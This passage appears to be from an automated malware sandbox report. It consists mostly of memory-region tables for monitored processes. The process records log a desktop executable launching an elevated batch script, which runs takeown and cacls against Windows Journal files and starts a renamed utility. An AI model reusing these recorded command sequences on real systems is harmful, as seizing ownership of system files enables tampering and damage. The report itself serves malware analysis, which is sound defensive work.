| private_0x00007ff696e0e000 | 0x7ff696e0e000 | 0x7ff696e0ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff696e10000 | 0x7ff696e10000 | 0x7ff696f0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff696f10000 | 0x7ff696f10000 | 0x7ff696f32fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff696f33000 | 0x7ff696f33000 | 0x7ff696f34fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff696f35000 | 0x7ff696f35000 | 0x7ff696f35fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff696f36000 | 0x7ff696f36000 | 0x7ff696f37fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff696f38000 | 0x7ff696f38000 | 0x7ff696f39fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff696f3a000 | 0x7ff696f3a000 | 0x7ff696f3bfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff696f3c000 | 0x7ff696f3c000 | 0x7ff696f3dfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff696f3e000 | 0x7ff696f3e000 | 0x7ff696f3ffff | Private Memory | rw |
|
|
|
- |
| wmiprvse.exe | 0x7ff6971b0000 | 0x7ff69722efff | Memory Mapped File | rwx |
|
|
|
- |
| mofd.dll | 0x7ff8db8c0000 | 0x7ff8db900fff | Memory Mapped File | rwx |
|
|
|
- |
| ncobjapi.dll | 0x7ff8dfe00000 | 0x7ff8dfe15fff | Memory Mapped File | rwx |
|
|
|
- |
| wmiutils.dll | 0x7ff8e0240000 | 0x7ff8e0264fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemsvc.dll | 0x7ff8e0290000 | 0x7ff8e02a3fff | Memory Mapped File | rwx |
|
|
|
- |
| fastprox.dll | 0x7ff8e02b0000 | 0x7ff8e03a7fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemprox.dll | 0x7ff8e06b0000 | 0x7ff8e06c0fff | Memory Mapped File | rwx |
|
|
|
- |
| wbemcomn.dll | 0x7ff8e56f0000 | 0x7ff8e576efff | Memory Mapped File | rwx |
|
|
|
- |
| wmiprov.dll | 0x7ff8e6e00000 | 0x7ff8e6e3cfff | Memory Mapped File | rwx |
|
|
|
- |
| wmiclnt.dll | 0x7ff8e7d90000 | 0x7ff8e7da0fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7ff8ea0f0000 | 0x7ff8ea121fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ff8ea270000 | 0x7ff8ea2a2fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ff8ea620000 | 0x7ff8ea636fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ff8ea790000 | 0x7ff8ea79afff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ff8eabd0000 | 0x7ff8eabf7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ff8eac00000 | 0x7ff8eac6afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ff8eae20000 | 0x7ff8eae2efff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ff8eb870000 | 0x7ff8eba4cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ff8ebb30000 | 0x7ff8ebbedfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ff8ebdc0000 | 0x7ff8ebf0dfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ff8ec240000 | 0x7ff8ec29afff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ff8ec450000 | 0x7ff8ec575fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ff8edb10000 | 0x7ff8edbb4fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ff8edbc0000 | 0x7ff8edd44fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ff8edd60000 | 0x7ff8edfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| ws2_32.dll | 0x7ff8ee040000 | 0x7ff8ee0a8fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ff8ee0b0000 | 0x7ff8ee14cfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ff8ee190000 | 0x7ff8ee235fff | Memory Mapped File | rwx |
|
|
|
- |
| nsi.dll | 0x7ff8ee250000 | 0x7ff8ee257fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ff8ee2d0000 | 0x7ff8ee37cfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
Process #188: cmd.exe
259
0
| Information | Value |
|---|---|
| ID | #188 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Journal\en-US\Journal.exe.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:13, Reason: Child Process |
| Unmonitor | End Time: 00:03:41, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:28 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x6f8 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B48
0x
A80
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000c30000 | 0x00c30000 | 0x04c2ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004c30000 | 0x04c30000 | 0x04c4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c30000 | 0x04c30000 | 0x04c3ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004c40000 | 0x04c40000 | 0x04c43fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c50000 | 0x04c50000 | 0x04c51fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c50000 | 0x04c50000 | 0x04c53fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004c60000 | 0x04c60000 | 0x04c73fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c80000 | 0x04c80000 | 0x04cbffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cc0000 | 0x04cc0000 | 0x04dbffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004dc0000 | 0x04dc0000 | 0x04dc3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004dd0000 | 0x04dd0000 | 0x04dd0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004de0000 | 0x04de0000 | 0x04de1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04df0000 | 0x04eadfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004eb0000 | 0x04eb0000 | 0x04eeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ef0000 | 0x04ef0000 | 0x04efffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f60000 | 0x04f60000 | 0x04f6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f70000 | 0x04f70000 | 0x051fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f70000 | 0x04f70000 | 0x0506ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005100000 | 0x05100000 | 0x051fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005200000 | 0x05200000 | 0x052dffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x052e0000 | 0x05616fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e770000 | 0x7e770000 | 0x7e86ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e870000 | 0x7e870000 | 0x7e892fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e897000 | 0x7e897000 | 0x7e899fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e89a000 | 0x7e89a000 | 0x7e89afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e89c000 | 0x7e89c000 | 0x7e89efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e89f000 | 0x7e89f000 | 0x7e89ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (187)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
26 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
3 | |
| Open | STD_OUTPUT_HANDLE | - |
|
89 | |
| Open | STD_INPUT_HANDLE | - |
|
6 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
10 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
5 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 82 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 61 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 22 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 168, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (2)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x808, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x408, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (43)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
12 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
5 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
6 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Journal.exe.mui" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
2 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
2 | |
| Set Environment String | name = FN, value = "Journal.exe.mui" |
|
1 |
Process #190: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #190 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\Dotted_Line.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:19, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xe5c |
| Parent PID | 0x430 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
D00
0x
244
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000110000 | 0x00110000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x0011ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x00123fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x00131fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00130000 | 0x00134fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000160000 | 0x00160000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x00201fff | Private Memory | rw |
|
|
|
- |
| takeown.exe | 0x00210000 | 0x0021ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x0421ffff | Pagefile Backed Memory | - |
|
|
|
- |
| locale.nls | 0x04220000 | 0x042ddfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000042e0000 | 0x042e0000 | 0x0431ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004320000 | 0x04320000 | 0x0432ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004330000 | 0x04330000 | 0x044bffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004330000 | 0x04330000 | 0x0436ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x04370000 | 0x04399fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004370000 | 0x04370000 | 0x04370fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004380000 | 0x04380000 | 0x04380fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000043c0000 | 0x043c0000 | 0x044bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000044c0000 | 0x044c0000 | 0x0461ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004620000 | 0x04620000 | 0x047a7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000047b0000 | 0x047b0000 | 0x04930fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004940000 | 0x04940000 | 0x05d3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x05d40000 | 0x06076fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x748a0000 | 0x748c7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x75400000 | 0x7542afff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x76e40000 | 0x76ff9fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x77000000 | 0x7714cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77150000 | 0x7728ffff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x77290000 | 0x772d3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x778d0000 | 0x779effff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f660000 | 0x7f660000 | 0x7f75ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f760000 | 0x7f760000 | 0x7f782fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f785000 | 0x7f785000 | 0x7f785fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f788000 | 0x7f788000 | 0x7f78afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f78b000 | 0x7f78b000 | 0x7f78bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f78d000 | 0x7f78d000 | 0x7f78ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #191: g13k6qzj.exe
175
0
| Information | Value |
|---|---|
| ID | #191 |
| File Name | c:\users\ciihmnxmn6ps\desktop\g13k6qzj.exe |
| Command Line | G13k6QZj.exe -accepteula "PDIALOG.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:14, Reason: Child Process |
| Unmonitor | End Time: 00:03:16, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x41c |
| Parent PID | 0x67c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
860
0x
868
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00023fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00031fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x00030fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00053fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x0009ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x0019ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001a0000 | 0x001a0000 | 0x001a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c1fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x001d0000 | 0x0028dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x002cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| g13k6qzj.exe | 0x00400000 | 0x00476fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x0000000000480000 | 0x00480000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00480000 | 0x004a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000004d0000 | 0x004d0000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00757fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000770000 | 0x00770000 | 0x0077ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000780000 | 0x00780000 | 0x00900fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000910000 | 0x00910000 | 0x01d0ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d10000 | 0x01d10000 | 0x01dcffff | Private Memory | rw |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74800000 | 0x74891fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x748e0000 | 0x748e7fff | Memory Mapped File | rwx |
|
|
|
